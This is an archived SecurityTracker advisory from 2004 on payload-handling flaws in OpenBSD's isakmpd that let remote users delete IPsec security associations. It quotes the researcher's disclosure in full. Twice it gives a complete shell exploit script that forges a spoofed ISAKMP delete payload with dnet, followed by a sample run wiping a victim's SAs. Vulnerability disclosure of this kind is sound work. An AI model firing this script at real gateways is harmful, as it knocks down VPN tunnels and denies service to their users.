SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   isakmpd Vendors:   OpenBSD
(Software Still Vulnerable) OpenBSD ISAKMP Daemon (isakmpd) May Let Remote Users Delete Arbitrary Security Associations
SecurityTracker Alert ID:  1010471
SecurityTracker URL:  http://securitytracker.com/id/1010471
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 11 2004
Impact:   Modification of system information
Exploit Included:  Yes  

Description:   Some vulnerabilities were reported in the OpenBSD ISAKMP daemon (isakmpd). A remote user may be able to cause denial of service conditions.

In November 2003, Thomas Walpuski reported that the software contains flaws in the processing of delete payloads that may allow a remote user to delete IKE and IPSec security associations (SAs).

The report indicated that, in Quick Mode, isakmpd does not require message encryption. Some Main Mode messages are also affected.

It is reported that isakmpd does not use payload encryption when responding in Quick Mode when the initiator did not apply payload encryption.

It is also reported that isakmpd will accept a Phase 2 message that contains a delete payload but not a hash payload.

It is also reported that "unexpected" hash payloads are not verified.

It is also reported that when the target isakmpd server receives a delete payload during Phase 2 negotiation, the server does not validate whether the sender is the owner of the referenced SA.

In June 2004, Thomas Walpuski reported that the software is still vulnerable.

A demonstration exploit script is provided:

attacker# cat during_these_hostile_and_trying_times_and_what-not
#!/bin/sh
if [ ! $# -eq 3 ]; then
echo "usage: $0 <faked-src> <victim> <spi>";
exit;
fi

src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \
$cky_i \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x01\x10\x02\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x58" \
"\x0c\x00\x00\x2c" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x20" \
"\x01\x01\x00\x01" \
"\x00\x00\x00\x18" \
"\x00\x01\x00\x00" \
"\x80\x01\x00\x05" \
"\x80\x02\x00\x02" \
"\x80\x03\x00\x01" \
"\x80\x04\x00\x02" \
"\x00\x00\x00\x10" \
"\x00\x00\x00\x01" \
"\x03\x04\x00\x01" \
$spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send

Impact:   A remote user may be able to generate a message to cause a security association to be deleted by the target isakmpd process.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.openbsd.org/ (Links to External Site)
Cause:   Authentication error
Underlying OS:  UNIX (FreeBSD), UNIX (NetBSD), UNIX (OpenBSD)

Message History:   This archive entry is a follow-up to the message listed below.
Nov 3 2003 OpenBSD ISAKMP Daemon (isakmpd) May Let Remote Users Delete Arbitrary Security Associations



 Source Message Contents

Subject:  unauthorized deletion of IPsec SAs in isakmpd, still


1 Abstract

  For nearly 10 months a handful of OpenBSD-developers is trying to fix
  a plethora of payload handling flaws in isakmpd. On 2004/01/13 they
  released something like a final patch to a broader public. The patch
  protects against some specific attacks, but does not solve the
  problem. 

2 Description

  Unauthorized deletion of IPsec SAs is still possible using a delete
  payload piggybacked on a initiation of main mode.

  For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

  All (recent) versions of isakmpd are affected. The attack has been
  successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

  Here we go. There is an IPsec tunnel between sg-a and sg-b:

    sg-a# cat /kern/ipsec | grep SPI
    SPI = 97e49ca2, Destination = <sg-a's IP address>, Sproto = 50
    SPI = 901e38d9, Destination = <sg-b's IP address>, Sproto = 50

  The attacker built some little script, because this time he wants to
  shoot down a bunch of IPsec SAs:

    attacker# cat during_these_hostile_and_trying_times_and_what-not
    #!/bin/sh
    if [ ! $# -eq 3 ]; then
      echo "usage: $0 <faked-src> <victim> <spi>";
      exit;
    fi
    
    src=$1; dst=$2
    spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
    cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
    
    dnet hex \
      $cky_i \
      "\x00\x00\x00\x00\x00\x00\x00\x00" \
      "\x01\x10\x02\x00" \
      "\x00\x00\x00\x00" \
      "\x00\x00\x00\x58" \
        "\x0c\x00\x00\x2c" \
        "\x00\x00\x00\x01" \
        "\x00\x00\x00\x01" \
          "\x00\x00\x00\x20" \
          "\x01\x01\x00\x01" \
          "\x00\x00\x00\x18" \
          "\x00\x01\x00\x00" \
          "\x80\x01\x00\x05" \
          "\x80\x02\x00\x02" \
          "\x80\x03\x00\x01" \
          "\x80\x04\x00\x02" \
        "\x00\x00\x00\x10" \
        "\x00\x00\x00\x01" \
        "\x03\x04\x00\x01" \
        $spi |
    dnet udp sport 500 dport 500 |
    dnet ip proto udp src $src dst $dst |
    dnet send

  He fires up his script with appropriate parameters:
    
    attacker# ./during_these_hostile_and_trying_times_and_what-not \
    > sg-b sg-a 901e38d9

  And the victim's IPsec SAs _and_ policies fade away almost
  instantaneous:
    
    sg-a# cat /kern/ipsec  
    Hashmask: 31, policy entries: 0

5 Solution?

  There are no bug fixes, yet.

Thomas Walpuski

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC